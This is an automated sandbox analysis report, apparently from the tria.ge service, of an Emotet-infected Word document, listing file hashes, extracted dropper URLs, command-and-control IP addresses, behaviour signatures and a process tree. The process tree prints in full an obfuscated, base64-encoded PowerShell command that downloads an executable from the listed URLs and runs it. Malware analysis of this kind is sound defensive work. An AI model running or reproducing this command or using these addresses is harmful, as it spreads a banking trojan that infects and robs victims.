Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

8

emotet_doc

windows7_x64

10

Analysis

  • max time kernel
    30s
  • max time network
    32s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    29/07/2020, 01:35

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    88b9aa3c90a28ecdd7adf28ea12e316d3b2c8a7086d315f97a2e62a77abd49af.doc

  • Size

    170KB

  • MD5

    f49b4d134476d19dcc417036db84d5ed

  • SHA1

    076fe5d8a16d8cb7e4d17d8a059997f67da3b2c4

  • SHA256

    88b9aa3c90a28ecdd7adf28ea12e316d3b2c8a7086d315f97a2e62a77abd49af

  • SHA512

    ce5f69bd2ae45198aa8bb37b2a1d1b4fe0a63075b8faf57f6856eb368e825b8f0b45488a9a6ceb4dc1df1db6a051a60b5694cecce75433c3077071418c8499f9

Score
10/10
trojanbankeremotet

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://mossfs.com.au/wp-content/fVrTuWOb/
exe.dropper

https://rtisistemas.com.br/jdetsob/Ov3a8106w4g7x17030547/
exe.dropper

http://slbqms.co.ls/cgi-bin/CHrsuXU/
exe.dropper

http://sertcom.net/_vti_bin/LiUoBmTHW/
exe.dropper

http://skpsoft.com/wp-admin/YnsFh/

Extracted

Family

emotet

C2

177.37.81.212:443

74.207.230.187:8080

190.164.75.175:80

87.252.100.28:80

105.209.239.55:80

163.172.107.70:8080

37.208.106.146:8080

24.157.25.203:80

212.112.113.235:80

140.207.113.106:443

75.139.38.211:80

192.210.217.94:8080

46.49.124.53:80

75.127.14.170:8080

87.106.231.60:8080

139.59.12.63:8080

181.167.35.84:80

201.214.108.231:80

74.208.173.91:8080

189.146.1.78:443
rsa_pubkey.plain

Signatures

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blacklisted process makes network request 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Modifies registry class 280 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

    trojanbankeremotet
  • Drops file in System32 directory 2 IoCs
  • Emotet Payload 2 IoCs

    Detects Emotet payload in memory.

  • Modifies system certificate store 2 TTPs 2 IoCs
    evasionspywaretrojan
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Executes dropped EXE 2 IoCs
  • Office loads VBA resources, possible macro or embedded object present

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\88b9aa3c90a28ecdd7adf28ea12e316d3b2c8a7086d315f97a2e62a77abd49af.doc"
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Modifies registry class
    PID:1420
  • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
    powersheLL -e JABZAFEAUABBAE8AYQBzAHIAPQAnAFkARABOAFIATQByAGoAYwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAYwB1AFIAYABpAFQAWQBwAFIAYABPAFQATwBgAEMAYABvAGwAIgAgAD0AIAAnAHQAbABzADEAMgAsACAAdABsAHMAMQAxACwAIAB0AGwAcwAnADsAJABEAEIAQQBKAEcAawBtAGUAIAA9ACAAJwA0ADkAJwA7ACQATgBGAEQASQBNAGQAaABjAD0AJwBQAEEARQBIAFQAbABwAGMAJwA7ACQAVwBSAFkAUwBZAHMAeABpAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABEAEIAQQBKAEcAawBtAGUAKwAnAC4AZQB4AGUAJwA7ACQAVwBDAFkAQQBHAHkAeQBlAD0AJwBNAFAASgBaAEQAagBiAHIAJwA7ACQAWABLAEQAQQBLAGIAegBzAD0ALgAoACcAbgBlAHcALQBvACcAKwAnAGIAJwArACcAagBlAGMAdAAnACkAIABuAGUAVAAuAHcAZQBiAEMATABJAEUATgB0ADsAJABHAEQAVwBHAFUAZwBsAGQAPQAnAGgAdAB0AHAAcwA6AC8ALwBtAG8AcwBzAGYAcwAuAGMAbwBtAC4AYQB1AC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAGYAVgByAFQAdQBXAE8AYgAvACoAaAB0AHQAcABzADoALwAvAHIAdABpAHMAaQBzAHQAZQBtAGEAcwAuAGMAbwBtAC4AYgByAC8AagBkAGUAdABzAG8AYgAvAE8AdgAzAGEAOAAxADAANgB3ADQAZwA3AHgAMQA3ADAAMwAwADUANAA3AC8AKgBoAHQAdABwADoALwAvAHMAbABiAHEAbQBzAC4AYwBvAC4AbABzAC8AYwBnAGkALQBiAGkAbgAvAEMASAByAHMAdQBYAFUALwAqAGgAdAB0AHAAOgAvAC8AcwBlAHIAdABjAG8AbQAuAG4AZQB0AC8AXwB2AHQAaQBfAGIAaQBuAC8ATABpAFUAbwBCAG0AVABIAFcALwAqAGgAdAB0AHAAOgAvAC8AcwBrAHAAcwBvAGYAdAAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AWQBuAHMARgBoAC8AJwAuACIAcwBwAGwAYABJAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABVAEgARABXAEcAeQBtAGMAPQAnAFUAVgBVAEcAWABvAGgAZwAnADsAZgBvAHIAZQBhAGMAaAAoACQAWQBHAE8AVQBYAG0AbgB0ACAAaQBuACAAJABHAEQAVwBHAFUAZwBsAGQAKQB7AHQAcgB5AHsAJABYAEsARABBAEsAYgB6AHMALgAiAGQAYABvAFcATgBsAG8AYABBAGAARABGAGkAbABlACIAKAAkAFkARwBPAFUAWABtAG4AdAAsACAAJABXAFIAWQBTAFkAcwB4AGkAKQA7ACQATQBOAFkARgBLAGgAbgB2AD0AJwBYAFAAVwBVAEYAYgBxAHUAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAJwArACcAdABlAG0AJwApACAAJABXAFIAWQBTAFkAcwB4AGkAKQAuACIATABlAG4AZwBgAFQAaAAiACAALQBnAGUAIAAzADUAOQA1ADEAKQAgAHsAKABbAHcAbQBpAGMAbABhAHMAcwBdACcAdwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcwAnACkALgAiAEMAYABSAGUAYQB0AGUAIgAoACQAVwBSAFkAUwBZAHMAeABpACkAOwAkAFoAVgBaAE8ARQBlAGUAaQA9ACcARwBSAFUAUwBYAGsAcABkACcAOwBiAHIAZQBhAGsAOwAkAFAAWABWAEoATABrAG8AbgA9ACcAWgBQAFMAUABEAHQAaQBoACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAE0AWgBVAEEARwB5AHIAcAA9ACcAQwBXAFoASwBRAHgAdABlACcA
    1⤵
    • Process spawned unexpected child process
    • Blacklisted process makes network request
    • Drops file in System32 directory
    • Modifies system certificate store
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    PID:1756
  • C:\Users\Admin\49.exe
    C:\Users\Admin\49.exe
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    • Drops file in System32 directory
    • Executes dropped EXE
    PID:324
    • C:\Windows\SysWOW64\SystemPropertiesDataExecutionPrevention\msimsg.exe
      "C:\Windows\SysWOW64\SystemPropertiesDataExecutionPrevention\msimsg.exe"
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Suspicious behavior: EnumeratesProcesses
      • Executes dropped EXE
      PID:832

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/324-11-0x0000000000270000-0x000000000027C000-memory.dmp

    Filesize

    48KB

    Download

  • memory/832-14-0x0000000000340000-0x000000000034C000-memory.dmp

    Filesize

    48KB

    Download

  • memory/1420-2-0x0000000008A90000-0x0000000008A94000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1420-4-0x0000000007020000-0x0000000007220000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/1420-5-0x000000000AF80000-0x000000000AF84000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1420-6-0x000000000C000000-0x000000000C004000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1420-15-0x0000000002010000-0x0000000002011000-memory.dmp

    Filesize

    4KB

    Download